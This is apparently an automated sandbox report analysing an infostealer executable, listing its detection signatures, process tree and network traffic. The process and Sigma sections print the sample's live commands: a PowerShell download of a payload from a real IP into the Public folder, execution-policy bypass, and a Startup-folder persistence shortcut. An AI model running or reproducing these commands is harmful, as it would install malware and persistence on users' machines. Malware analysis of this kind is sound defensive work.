Windows Analysis Report
cxZuGa.exe

Overview

General Information

Sample name: cxZuGa.exe
Analysis ID: 1583285
MD5: 243e64fa2b25bba3e6c710de1bdd4b0c
SHA1: a5d90ba12791750258295c3601f55bc170badaa4
SHA256: cb284dd8a8bf729793df1cac357478c0bed3d011ae5f2b9223327ce9973f2172
Tags: exe, infostealer, malware, user-Joker
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cxZuGa.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\cxZuGa.exe" MD5: 243E64FA2B25BBA3E6C710DE1BDD4B0C)
    • powershell.exe (PID: 3752 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 940 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 6088 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5828 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 5688 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 432 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 940, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 6088, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 6088, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 5828, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5688, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3752, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5688, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 432, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3752, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5688, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T10:54:56.815357+0100 | 1810003 | 2 | Potentially Bad Traffic | 139.99.188.124 | 80 | 192.168.2.5 | 49704 | TCP
2025-01-02T10:54:56.815327+0100 | 1810000 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 139.99.188.124 | 80 | TCP

AV Detection

Source: cxZuGa.exe ReversingLabs: Detection: 44%
Source: cxZuGa.exe Virustotal: Detection: 61%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.5% probability
Source: cxZuGa.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7EC19C7C0
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC162F50 FindFirstFileExW,0_2_00007FF7EC162F50
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7EC1AA874
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA350
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7EC1A6428
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA4F8
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19BC70
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19B7C0
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1A71F4 FindFirstFileW,FindClose,0_2_00007FF7EC1A71F4
Source: C:\Users\user\Desktop\cxZuGa.exe Code function: 0_2_00007FF7EC1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7EC1A72A8
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C94005
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C9494A
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9C2FF
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C9CD9F
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9CD14 FindFirstFileW,FindClose,6_2_00C9CD14
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F5D8
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F735
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9FA36
Source: C:\Users\Public\Guard.exe Code function: 6_2_00C93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C93CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_00654005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00654005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0065494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065CD14 FindFirstFileW,FindClose,11_2_0065CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0065CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_0065FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 11_2_00653CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00653CE2

Networking

Source: Network traffic Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 139.99.188.124:80
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 09:54:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 16 Dec 2024 15:40:22 GMT ETag: "da2a8-62964ffa303b5" Accept-Ranges: bytes Content-Length: 893608 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kYCQj.txt HTTP/1.1 Host: 139.99.188.124 Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 139.99.188.124
Source: Joe Sandbox View ASN Name: OVHFR
Source: Network traffic Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 139.99.188.124:80 -> 192.168.2.5:49704
Source: unknown DNS traffic detected: query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs replaycode: Name error (3)
Source: global traffic HTTP traffic detected: GET /TSKUVpnJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 139.99.188.124 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AE968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF7EC1AE968
Source: global traffic HTTP traffic detected: GET /TSKUVpnJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /kYCQj.txt HTTP/1.1 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: cxZuGa.exe, 00000000.00000002.2060480429.0000017C03FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/TSKUVpnJ
Source: powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.0.drString found in binary or memory: http://139.99.188.124/kYCQj.txt
Source: powershell.exe, 00000004.00000002.2097758108.00000236544AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H2.
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
